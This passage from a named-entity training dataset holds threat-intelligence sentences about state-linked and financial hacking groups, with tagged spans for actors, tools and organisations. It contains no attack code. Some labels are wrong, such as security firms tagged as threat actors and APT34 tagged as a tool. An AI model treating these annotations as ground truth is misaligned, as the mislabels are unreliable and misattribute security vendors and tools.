{"text": "Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East (including targets inside Iran itself) , as well as across Europe and in the United States .", "spans": {"THREAT_ACTOR: Magic Hound": [[102, 113]]}, "info": {"id": "dnrti_train_003348", "source": "dnrti_train"}} {"text": "The activity surfaced in Southeast Asia , a region where APT10 frequently operates .", "spans": {"THREAT_ACTOR: APT10": [[57, 62]]}, "info": {"id": "dnrti_train_003350", "source": "dnrti_train"}} {"text": "APT10 frequently targets the Southeast Asia region .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]]}, "info": {"id": "dnrti_train_003352", "source": "dnrti_train"}} {"text": "Both of the loader’s variants and their various payloads that enSilo analyzed share similar Tactics , Techniques , and Procedures (TTPs) and code associated with APT10 .", "spans": {"ORGANIZATION: enSilo": [[62, 68]], "THREAT_ACTOR: APT10": [[162, 167]]}, "info": {"id": "dnrti_train_003353", "source": "dnrti_train"}} {"text": "Over the past three months , Recorded Future’s Insikt Group has observed an increase in APT33’s also known as Elfin infrastructure building and targeting activity , and on June 21 , 2019 , Yahoo .", "spans": {"ORGANIZATION: Recorded Future’s": [[29, 46]], "THREAT_ACTOR: APT33’s": [[88, 95]], "THREAT_ACTOR: Elfin": [[110, 115]]}, "info": {"id": "dnrti_train_003356", "source": "dnrti_train"}} {"text": "News reported that the U.S. Cyber Command launched cyberattacks on an Iranian spy group .", "spans": {"ORGANIZATION: U.S. 
Cyber": [[23, 33]], "THREAT_ACTOR: group": [[82, 87]]}, "info": {"id": "dnrti_train_003357", "source": "dnrti_train"}} {"text": "Iranian state-sponsored threat actor APT33 has been conducting cyberespionage activity since at least 2013 , predominantly targeting nations in the Middle East , but also notably targeting U.S. , South Korean , and European commercial entities across a wide variety of sectors .", "spans": {"THREAT_ACTOR: APT33": [[37, 42]]}, "info": {"id": "dnrti_train_003358", "source": "dnrti_train"}} {"text": "Our research found that APT33 , or a closely aligned threat actor , continues to conduct and prepare for widespread cyberespionage activity , with over 1 , 200 domains used since March 28 , 2019 and with a strong emphasis on using commodity malware .", "spans": {"THREAT_ACTOR: APT33": [[24, 29]]}, "info": {"id": "dnrti_train_003359", "source": "dnrti_train"}} {"text": "The targeting of mainly Saudi Arabian organizations across a wide variety of industries aligns with historical targeting patterns for the group , which appear undeterred following previous exposés of their activity .", "spans": {"THREAT_ACTOR: group": [[138, 143]]}, "info": {"id": "dnrti_train_003360", "source": "dnrti_train"}} {"text": "Towards the end of April 2019 , we tracked down what we believe to be new activity by APT10 , a Chinese cyber espionage group .", "spans": {"THREAT_ACTOR: APT10": [[86, 91]], "THREAT_ACTOR: group": [[120, 125]]}, "info": {"id": "dnrti_train_003361", "source": "dnrti_train"}} {"text": "Almost 60% of the suspected APT33 domains that were classified to malware families related to njRAT infections , a RAT not previously associated with APT33 activity .", "spans": {"THREAT_ACTOR: APT33": [[28, 33], [150, 155]], "TOOL: njRAT": [[94, 99]]}, "info": {"id": "dnrti_train_003362", "source": "dnrti_train"}} {"text": "Other commodity RAT malware families , such as AdwindRAT and RevengeRAT , were also linked to suspected APT33 domain activity .", "spans": 
{"TOOL: AdwindRAT": [[47, 56]], "TOOL: RevengeRAT": [[61, 71]], "THREAT_ACTOR: APT33": [[104, 109]]}, "info": {"id": "dnrti_train_003363", "source": "dnrti_train"}} {"text": "APT33 is an Iranian state-sponsored threat actor that has engaged in cyberespionage activities since at least 2013 .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "dnrti_train_003364", "source": "dnrti_train"}} {"text": "Western and Saudi organizations in industries that have been historically targeted by APT33 should be monitoring geopolitical developments and increasing the scrutiny of operational security controls focusing on detection and remediation of initial unauthorized access , specifically from phishing campaigns , webshells .", "spans": {"THREAT_ACTOR: APT33": [[86, 91]]}, "info": {"id": "dnrti_train_003365", "source": "dnrti_train"}} {"text": "Symantec’s Elfin report denoted additional targeting of the engineering , chemical , research , finance , IT , and healthcare sectors .", "spans": {"ORGANIZATION: Symantec’s": [[0, 10]], "THREAT_ACTOR: Elfin": [[11, 16]]}, "info": {"id": "dnrti_train_003366", "source": "dnrti_train"}} {"text": "We assess that the recent reporting on links between the Nasr Institute and Kavosh Security Group , as well as technical and persona analysis , overlaps among APT33 , APT35 , and MUDDYWATER , and is probably a result of the tiered structure that Iran utilizes to manage cyber operations .", "spans": {"ORGANIZATION: Nasr Institute": [[57, 71]], "THREAT_ACTOR: Group": [[92, 97]], "THREAT_ACTOR: APT33": [[159, 164]], "THREAT_ACTOR: APT35": [[167, 172]], "THREAT_ACTOR: MUDDYWATER": [[179, 189]]}, "info": {"id": "dnrti_train_003367", "source": "dnrti_train"}} {"text": "Recorded Future has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) .", "spans": {"ORGANIZATION: Recorded Future": [[0, 15]], "THREAT_ACTOR: APT33": 
[[36, 41]]}, "info": {"id": "dnrti_train_003368", "source": "dnrti_train"}} {"text": "FireEye also noted in their 2017 report that the online handle xman_1365_x , ” found within the PDB path in an APT33 TURNEDUP backdoor sample , belonged to an individual at the Nasr Institute .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT33": [[111, 116]]}, "info": {"id": "dnrti_train_003369", "source": "dnrti_train"}} {"text": "Recorded Future’s Insikt Group has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) .", "spans": {"ORGANIZATION: Recorded Future’s": [[0, 17]], "THREAT_ACTOR: Insikt": [[18, 24]], "THREAT_ACTOR: Group": [[25, 30]], "THREAT_ACTOR: APT33": [[51, 56]]}, "info": {"id": "dnrti_train_003370", "source": "dnrti_train"}} {"text": "Based on this information , it is possible that upon the exposure of the Nasr Institute as a front for Iranian state-sponsored offensive cyber activity , employees transitioned over to other entities , such as Kavosh , to protect their identities and minimize further exposure .", "spans": {"THREAT_ACTOR: Nasr": [[73, 77]]}, "info": {"id": "dnrti_train_003371", "source": "dnrti_train"}} {"text": "Insikt Group researchers used proprietary methods , including Recorded Future Domain Analysis and Recorded Future Network Traffic Analysis , along with other common analytical approaches , to profile recently reported Iranian threat actor APT33’s domain and hosting infrastructure in an effort to identify recent activity .", "spans": {"ORGANIZATION: Insikt": [[0, 6]], "ORGANIZATION: Recorded Future": [[98, 113]], "THREAT_ACTOR: APT33’s": [[239, 246]]}, "info": {"id": "dnrti_train_003372", "source": "dnrti_train"}} {"text": "Insikt Group enumerated all domains reported as being used by APT33 since January 2019 .", "spans": {"ORGANIZATION: Insikt": [[0, 6]], "THREAT_ACTOR: APT33": [[62, 67]]}, "info": 
{"id": "dnrti_train_003373", "source": "dnrti_train"}} {"text": "Using data from Recorded Future Domain Analysis and combining it with data derived from Recorded Future Network Traffic Analysis , Insikt Group researchers were able to identify a small selection of likely targeted organizations impacted by suspected APT33 activity .", "spans": {"ORGANIZATION: Recorded Future": [[16, 31]], "ORGANIZATION: Insikt Group": [[131, 143]], "THREAT_ACTOR: APT33": [[251, 256]]}, "info": {"id": "dnrti_train_003375", "source": "dnrti_train"}} {"text": "Following the exposure of a wide range of their infrastructure and operations by Symantec earlier this year , we discovered that APT33 , or closely aligned actors , reacted by either parking or reassigning some of their domain infrastructure .", "spans": {"ORGANIZATION: Symantec": [[81, 89]], "THREAT_ACTOR: APT33": [[129, 134]]}, "info": {"id": "dnrti_train_003376", "source": "dnrti_train"}} {"text": "Since late March , suspected APT33 threat actors have continued to use a large swath of operational infrastructure , well in excess of 1 , 200 domains , with many observed communicating with 19 different commodity RAT implants .", "spans": {"THREAT_ACTOR: APT33": [[29, 34]], "TOOL: RAT": [[214, 217]]}, "info": {"id": "dnrti_train_003377", "source": "dnrti_train"}} {"text": "While we haven’t observed a widespread targeting of commercial entities or regional adversaries like in previously documented APT33 operations , the handful of targeted organizations that we did observe were mainly located in Saudi Arabia across a range of industries , indicating ongoing targeting aligned with geopolitical aims .", "spans": {"ORGANIZATION: we": [[6, 8]], "THREAT_ACTOR: APT33": [[126, 131]]}, "info": {"id": "dnrti_train_003378", "source": "dnrti_train"}} {"text": "The zip contained a sample of the Poison Ivy malware which is also known to be used by APT10 .", "spans": {"TOOL: Poison Ivy": [[34, 44]], "THREAT_ACTOR: APT10": [[87, 92]]}, "info": 
{"id": "dnrti_train_003379", "source": "dnrti_train"}} {"text": "The new malware families , which we will examine later in this post , show APT34 relying on their PowerShell development capabilities , as well as trying their hand at Golang .", "spans": {"THREAT_ACTOR: APT34": [[75, 80]], "TOOL: PowerShell": [[98, 108]]}, "info": {"id": "dnrti_train_003380", "source": "dnrti_train"}} {"text": "Additionally , with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE) , Intelligence , and Advanced Practices teams , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 .", "spans": {"ORGANIZATION: FireEye": [[42, 49]], "ORGANIZATION: Advanced Practices": [[113, 131]], "TOOL: APT34": [[255, 260]]}, "info": {"id": "dnrti_train_003381", "source": "dnrti_train"}} {"text": "This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however , we believe APT34's strongest interest is gaining access to financial , energy , and government entities .", "spans": {"THREAT_ACTOR: group": [[12, 17]]}, "info": {"id": "dnrti_train_003382", "source": "dnrti_train"}} {"text": "Additionally , with the assistance of FireEye Labs , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 .", "spans": {"ORGANIZATION: FireEye Labs": [[38, 50]], "TOOL: PICKPOCKET": [[116, 126]], "THREAT_ACTOR: APT34": [[168, 173]]}, "info": {"id": "dnrti_train_003383", "source": "dnrti_train"}} {"text": "APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014 .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]]}, "info": {"id": "dnrti_train_003384", "source": "dnrti_train"}} {"text": "This CPE was created to ensure our customers are updated with new discoveries , activity and detection efforts related to this campaign , along with other recent activity from Iranian-nexus threat 
actors to include APT33 , which is mentioned in this updated FireEye blog post .", "spans": {"THREAT_ACTOR: APT33": [[215, 220]], "ORGANIZATION: FireEye": [[258, 265]]}, "info": {"id": "dnrti_train_003385", "source": "dnrti_train"}} {"text": "On June 19 , 2019 , FireEye’s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances .", "spans": {"ORGANIZATION: FireEye’s": [[20, 29]], "ORGANIZATION: FireEye": [[123, 130]]}, "info": {"id": "dnrti_train_003386", "source": "dnrti_train"}} {"text": "A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution .", "spans": {"MALWARE: TONEDEAF": [[110, 118]]}, "info": {"id": "dnrti_train_003387", "source": "dnrti_train"}} {"text": "FireEye’s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations .", "spans": {"ORGANIZATION: FireEye’s": [[0, 9]], "THREAT_ACTOR: APT34": [[117, 122]], "ORGANIZATION: victim organizations": [[139, 159]]}, "info": {"id": "dnrti_train_003388", "source": "dnrti_train"}} {"text": "This tool was previously observed during a Mandiant incident response in 2018 and , to date , solely utilized by APT34 .", "spans": {"TOOL: tool": [[5, 9]], "THREAT_ACTOR: APT34": [[113, 118]]}, "info": {"id": "dnrti_train_003390", "source": "dnrti_train"}} {"text": "Several spear-phishing campaigns attributed to Carbanak , all occurring between March and May 2018 , were analyzed by security researchers in 2018 .", "spans": {"THREAT_ACTOR: Carbanak": [[47, 55]]}, "info": {"id": "dnrti_train_003393", "source": "dnrti_train"}} {"text": "One of the most prolific APT-style cyberattacks , specifically targeting the financial sector , is known as Carbanak .", "spans": {"THREAT_ACTOR: Carbanak": 
[[108, 116]]}, "info": {"id": "dnrti_train_003394", "source": "dnrti_train"}} {"text": "Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process .", "spans": {}, "info": {"id": "dnrti_train_003395", "source": "dnrti_train"}} {"text": "The same group is believed to have also been using the Cobalt Strike framework to run sophisticated campaigns , plotting and performing financial heists of financial institutions .", "spans": {"THREAT_ACTOR: group": [[9, 14]], "TOOL: framework": [[69, 78]]}, "info": {"id": "dnrti_train_003396", "source": "dnrti_train"}} {"text": "A Carbanak trademark in cyberattacks remains the use of Cobalt Strike – a powerful pentesting tool designed for exploiting and executing malicious code , simulating post-exploitation actions of advanced threat actors – which allows them to infiltrate the organization , move laterally , exfiltrate data , and deploy anti-forensic and evasion tools .", "spans": {"THREAT_ACTOR: Carbanak": [[2, 10]], "TOOL: Cobalt Strike": [[56, 69]]}, "info": {"id": "dnrti_train_003398", "source": "dnrti_train"}} {"text": "However , this action doesn’t appear to have made a dent in the cybercriminal organization , as subsequent spear-phishing campaigns seem to have been reported from March until May 2018 .", "spans": {}, "info": {"id": "dnrti_train_003399", "source": "dnrti_train"}} {"text": "Bitdefender’s forensics and investigation team was contacted to look into a security incident that started in May 2018 with an email received by two of the bank’s employees .", "spans": {"THREAT_ACTOR: Bitdefender’s": [[0, 13]]}, "info": {"id": "dnrti_train_003400", "source": "dnrti_train"}} {"text": "The Carbanak group , which has a long track record of compromising infrastructure belonging to financial institutions , is still active .", "spans": {"THREAT_ACTOR: Carbanak": [[4, 12]]}, "info": {"id": "dnrti_train_003401", 
"source": "dnrti_train"}} {"text": "Its purpose remains to manipulate financial assets , such as transferring funds from bank accounts or taking over ATM infrastructures and instructing them to dispense cash at predetermined time intervals .", "spans": {"THREAT_ACTOR: Its": [[0, 3]]}, "info": {"id": "dnrti_train_003402", "source": "dnrti_train"}} {"text": "The actors uploaded a variety of tools that they used to perform additional activities on the compromised network , such as dumping credentials , as well as locating and pivoting to additional systems on the network .", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "TOOL: dumping credentials": [[124, 143]]}, "info": {"id": "dnrti_train_003404", "source": "dnrti_train"}} {"text": "We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell .", "spans": {"THREAT_ACTOR: Emissary Panda": [[11, 25]], "VULNERABILITY: vulnerability": [[55, 68]], "VULNERABILITY: CVE-2019-0604": [[104, 117]]}, "info": {"id": "dnrti_train_003405", "source": "dnrti_train"}} {"text": "Bitdefender’s investigation shows the attackers’ main methods remain to quietly infiltrate the infrastructure by establishing a foothold on an employee’s system , then move laterally across the infrastructure or elevate privileges to find critical systems that manage financial transactions or ATM networks .", "spans": {"THREAT_ACTOR: Bitdefender’s": [[0, 13]]}, "info": {"id": "dnrti_train_003406", "source": "dnrti_train"}} {"text": "We also found the China Chopper webshell on the SharePoint servers , which has also been used by the Emissary Panda threat group .", "spans": {"TOOL: China Chopper webshell": [[18, 40]], "THREAT_ACTOR: Emissary Panda": [[101, 115]]}, "info": {"id": "dnrti_train_003407", "source": "dnrti_train"}} {"text": "Of particular note is their use of tools to identify systems 
vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 .", "spans": {"VULNERABILITY: CVE-2017-0144": [[75, 88]]}, "info": {"id": "dnrti_train_003408", "source": "dnrti_train"}} {"text": "This webshell activity took place across three SharePoint servers hosted by two different government organizations between April 1 , 2019 and April 16 , 2019 , where actors uploaded a total of 24 unique executables across the three SharePoint servers .", "spans": {}, "info": {"id": "dnrti_train_003410", "source": "dnrti_train"}} {"text": "The timeline shows three main clusters of activity across the three webshells , with activity occurring on two separate webshells (green and orange) within a very small window of time on April 2 , 2019 and the activity involving the third webshell two weeks later on April 16 , 2019 .", "spans": {}, "info": {"id": "dnrti_train_003411", "source": "dnrti_train"}} {"text": "We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda .", "spans": {"THREAT_ACTOR: actors": [[21, 27]], "TOOL: HyperBro": [[63, 71]], "THREAT_ACTOR: Emissary Panda": [[106, 120]]}, "info": {"id": "dnrti_train_003414", "source": "dnrti_train"}} {"text": "During our research into this attack campaign , Unit 42 gathered several tools that the Emissary Panda uploaded to the three webshells at the two government organizations .", "spans": {"ORGANIZATION: Unit 42": [[48, 55]], "THREAT_ACTOR: Emissary Panda": [[88, 102]], "ORGANIZATION: government organizations": [[146, 170]]}, "info": {"id": "dnrti_train_003416", "source": "dnrti_train"}} {"text": "We also observed the actors uploading the HyperBro backdoor to one of the webshells , as well as legitimate executables that would sideload malicious DLLs that have overlapping code associated with known Emissary Panda activity .", "spans": {"THREAT_ACTOR: actors": [[21, 27]], "TOOL: 
HyperBro backdoor": [[42, 59]], "THREAT_ACTOR: Emissary Panda": [[204, 218]]}, "info": {"id": "dnrti_train_003417", "source": "dnrti_train"}} {"text": "Lastly , we saw the actor uploading a custom backdoor called HyperBro , which has been associated with Emissary Panda operations in the past .", "spans": {"THREAT_ACTOR: actor": [[20, 25]], "TOOL: HyperBro": [[61, 69]], "THREAT_ACTOR: Emissary Panda": [[103, 117]]}, "info": {"id": "dnrti_train_003418", "source": "dnrti_train"}} {"text": "However , using NCC Group’s research published in May 2018 , we were able to discover code overlaps between these DLLs and a sideloaded DLL that ran the SysUpdate tool that the NCC group has associated with an Emissary Panda campaign .", "spans": {"ORGANIZATION: NCC": [[16, 19], [177, 180]], "THREAT_ACTOR: Emissary Panda": [[210, 224]]}, "info": {"id": "dnrti_train_003422", "source": "dnrti_train"}} {"text": "The list also includes several hack tools , such as Mimikatz for credential dumping and several compiled python scripts used to locate and compromise other systems on the local network .", "spans": {"TOOL: hack tools": [[31, 41]], "TOOL: Mimikatz": [[52, 60]], "TOOL: python scripts": [[105, 119]]}, "info": {"id": "dnrti_train_003423", "source": "dnrti_train"}} {"text": "Unfortunately , we do not have access to the PYTHON33.hlp or CreateTsMediaAdm.hlp files , so we do not know the final payload loaded by either of these DLLs .", "spans": {}, "info": {"id": "dnrti_train_003424", "source": "dnrti_train"}} {"text": "According to Microsoft’s advisory , this vulnerability was patched on March 12 , 2019 and we first saw the webshell activity on April 1 , 2019 .", "spans": {"ORGANIZATION: Microsoft’s": [[13, 24]]}, "info": {"id": "dnrti_train_003428", "source": "dnrti_train"}} {"text": "Once the adversary established a foothold on the targeted network , they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials , perform network 
reconnaissance and pivot to other systems .", "spans": {"THREAT_ACTOR: they": [[68, 72]], "TOOL: China Chopper": [[78, 91]]}, "info": {"id": "dnrti_train_003430", "source": "dnrti_train"}} {"text": "We also observed Emissary Panda uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before .", "spans": {"THREAT_ACTOR: Emissary Panda": [[17, 31]]}, "info": {"id": "dnrti_train_003431", "source": "dnrti_train"}} {"text": "Consequently , the Linux malware ecosystem is plagued by financial driven crypto-miners and DDoS botnet tools which mostly target vulnerable servers .", "spans": {"ORGANIZATION: vulnerable servers": [[130, 148]]}, "info": {"id": "dnrti_train_003432", "source": "dnrti_train"}} {"text": "We also observed the actors uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before .", "spans": {"THREAT_ACTOR: actors": [[21, 27]], "TOOL: Sublime Text": [[99, 111]], "TOOL: Media application": [[151, 168]]}, "info": {"id": "dnrti_train_003433", "source": "dnrti_train"}} {"text": "It has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government .", "spans": {"THREAT_ACTOR: It": [[0, 2]]}, "info": {"id": "dnrti_train_003434", "source": "dnrti_train"}} {"text": "The group’s implants are characterized by the employment of information stealing tools among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task .", "spans": {"THREAT_ACTOR: group’s": [[4, 11]], "TOOL: stealing tools": [[72, 86]], "TOOL: document stealers": [[119, 136]]}, "info": {"id": "dnrti_train_003435", "source": "dnrti_train"}} {"text": "The finding shows that EvilGnome operates on an IP 
address that was controlled by the Gamaredon group two months ago .", "spans": {"TOOL: EvilGnome": [[23, 32]], "THREAT_ACTOR: Gamaredon group": [[86, 101]]}, "info": {"id": "dnrti_train_003436", "source": "dnrti_train"}} {"text": "FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]]}, "info": {"id": "dnrti_train_003437", "source": "dnrti_train"}} {"text": "The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year .", "spans": {"THREAT_ACTOR: FIN7": [[4, 8]]}, "info": {"id": "dnrti_train_003438", "source": "dnrti_train"}} {"text": "In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations .", "spans": {"ORGANIZATION: we": [[41, 43]], "THREAT_ACTOR: attacker groups": [[85, 100]], "THREAT_ACTOR: FIN7": [[134, 138]]}, "info": {"id": "dnrti_train_003439", "source": "dnrti_train"}} {"text": "In 2018-2019 , researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests .", "spans": {"ORGANIZATION: Kaspersky": [[30, 39]], "THREAT_ACTOR: FIN7": [[178, 182]], "THREAT_ACTOR: threat actor": [[230, 242]]}, "info": {"id": "dnrti_train_003440", "source": "dnrti_train"}} {"text": "One of the domains used by FIN7 in their 2018 campaign of spear phishing contained more than 130 email HackOrges , leading us to think that more than 130 companies had been targeted by the end of 2018 .", "spans": {"THREAT_ACTOR: FIN7": [[27, 31]]}, "info": {"id": "dnrti_train_003441", "source": "dnrti_train"}} {"text": "Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a 
homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 .", "spans": {"THREAT_ACTOR: FIN7": [[73, 77]], "TOOL: malicious Office document": [[134, 159]]}, "info": {"id": "dnrti_train_003442", "source": "dnrti_train"}} {"text": "Given FIN7’s previous use of false security companies , we decided to look deeper into this one .", "spans": {"THREAT_ACTOR: FIN7’s": [[6, 12]], "ORGANIZATION: security companies": [[35, 53]]}, "info": {"id": "dnrti_train_003445", "source": "dnrti_train"}} {"text": "This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions .", "spans": {"THREAT_ACTOR: activity cluster": [[5, 21]], "ORGANIZATION: Kaspersky": [[30, 39]]}, "info": {"id": "dnrti_train_003446", "source": "dnrti_train"}} {"text": "FIN7’s last campaigns were targeting banks in Europe and Central America .", "spans": {"THREAT_ACTOR: FIN7’s": [[0, 6]]}, "info": {"id": "dnrti_train_003447", "source": "dnrti_train"}} {"text": "After a successful penetration , FIN7 uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access .", "spans": {"THREAT_ACTOR: FIN7": [[33, 37]], "TOOL: backdoors": [[51, 60]], "TOOL: CobaltStrike framework": [[69, 91]], "TOOL: Powershell": [[95, 105]]}, "info": {"id": "dnrti_train_003448", "source": "dnrti_train"}} {"text": "AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members .", "spans": {"THREAT_ACTOR: AveMaria": [[0, 8]], "THREAT_ACTOR: FIN7": [[107, 111]]}, "info": {"id": "dnrti_train_003449", "source": "dnrti_train"}} {"text": "This threat actor stole suspected of stealing €13 million from Bank of Valetta , Malta earlier this year .", "spans": {"THREAT_ACTOR: threat actor": [[5, 17]], 
"ORGANIZATION: Bank": [[63, 67]]}, "info": {"id": "dnrti_train_003450", "source": "dnrti_train"}} {"text": "They also use AutoIT droppers , password-protected EXE files and even ISO images .", "spans": {"THREAT_ACTOR: They": [[0, 4]], "TOOL: AutoIT droppers": [[14, 29]]}, "info": {"id": "dnrti_train_003452", "source": "dnrti_train"}} {"text": "Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center .", "spans": {"THREAT_ACTOR: actor": [[21, 26]]}, "info": {"id": "dnrti_train_003454", "source": "dnrti_train"}} {"text": "At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called CopyPaste” from a previously unknown APT .", "spans": {"THREAT_ACTOR: FIN7": [[45, 49]]}, "info": {"id": "dnrti_train_003455", "source": "dnrti_train"}} {"text": "FIN7 and Cobalt used decoy 302 HTTP redirections too , FIN7 on its GRIFFON C2s before January 2018 , and Cobalt , on its staging servers , similar to CopyPaste .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4], [55, 59]], "THREAT_ACTOR: Cobalt": [[9, 15]]}, "info": {"id": "dnrti_train_003456", "source": "dnrti_train"}} {"text": "Quite recently , FIN7 threat actors typosquatted the brand Digicert” using the domain name digicert-cdn[.]com , which is used as a command and control server for their GRIFFON implants .", "spans": {"THREAT_ACTOR: FIN7": [[17, 21]], "ORGANIZATION: Digicert”": [[59, 68]], "TOOL: command": [[131, 138]], "TOOL: control server": [[143, 157]]}, "info": {"id": "dnrti_train_003457", "source": "dnrti_train"}} {"text": "The second one is CobaltGoblin Carbanak EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers .", "spans": {"THREAT_ACTOR: CobaltGoblin": [[18, 30]], "THREAT_ACTOR: Carbanak": [[31, 39]], 
"THREAT_ACTOR: EmpireMonkey": [[40, 52]]}, "info": {"id": "dnrti_train_003459", "source": "dnrti_train"}} {"text": "We observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks .", "spans": {"ORGANIZATION: We": [[0, 2]], "THREAT_ACTOR: groups": [[86, 92]], "TOOL: similar toolkits": [[104, 120]], "TOOL: infrastructure": [[134, 148]]}, "info": {"id": "dnrti_train_003460", "source": "dnrti_train"}} {"text": "The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center .", "spans": {"THREAT_ACTOR: CopyPaste": [[39, 48]], "ORGANIZATION: companies": [[93, 102]], "ORGANIZATION: training center": [[208, 223]]}, "info": {"id": "dnrti_train_003461", "source": "dnrti_train"}} {"text": "At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks .", "spans": {"THREAT_ACTOR: cluster": [[25, 32]], "TOOL: CobaltStrike": [[57, 69]], "TOOL: Powershell": [[79, 89]]}, "info": {"id": "dnrti_train_003462", "source": "dnrti_train"}} {"text": "FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]]}, "info": {"id": "dnrti_train_003463", "source": "dnrti_train"}} {"text": "MuddyWater is widely regarded as a long-lived APT group in the Middle East .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]]}, "info": {"id": "dnrti_train_003464", "source": "dnrti_train"}} {"text": "From February to April 2019 , MuddyWater launched a series of spear-phishing attacks against governments , educational institutions , financial , telecommunications and defense companies in Turkey , Iran , Afghanistan , Iraq , 
Tajikistan and Azerbaijan .", "spans": {"THREAT_ACTOR: MuddyWater": [[30, 40]], "ORGANIZATION: governments": [[93, 104]]}, "info": {"id": "dnrti_train_003465", "source": "dnrti_train"}} {"text": "FIN7 thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]]}, "info": {"id": "dnrti_train_003466", "source": "dnrti_train"}} {"text": "We also unearthed and detailed our other findings on MuddyWater , such as its connection to four Android malware variants and its use of false flag techniques , among others , in our report New MuddyWater Activities Uncovered: Threat Actors Used Multi-Stage Backdoors , False Flags , Android Malware , and More .", "spans": {"THREAT_ACTOR: MuddyWater": [[53, 63]], "TOOL: Android malware": [[97, 112]], "TOOL: Multi-Stage Backdoors": [[246, 267]], "TOOL: False Flags": [[270, 281]], "TOOL: Android Malware": [[284, 299]]}, "info": {"id": "dnrti_train_003467", "source": "dnrti_train"}} {"text": "Instead , the campaign used compromised legitimate accounts to trick victims into installing malware .", "spans": {"TOOL: compromised legitimate accounts": [[28, 59]]}, "info": {"id": "dnrti_train_003468", "source": "dnrti_train"}} {"text": "Notably , the group’s use of email as infection vector seems to yield success for their campaigns .", "spans": {"THREAT_ACTOR: group’s": [[14, 21]], "TOOL: email": [[29, 34]]}, "info": {"id": "dnrti_train_003469", "source": "dnrti_train"}} {"text": "We also observed MuddyWater’s use of multiple open source post-exploitation tools , which they deployed after successfully compromising a target .", "spans": {"THREAT_ACTOR: MuddyWater’s": [[17, 29]], "TOOL: post-exploitation tools": [[58, 81]]}, "info": {"id": "dnrti_train_003470", "source": "dnrti_train"}} {"text": "The attacker also connected to the compromised servers from IP addresses that were linked to dynamic domain names used as C&Cs by the 
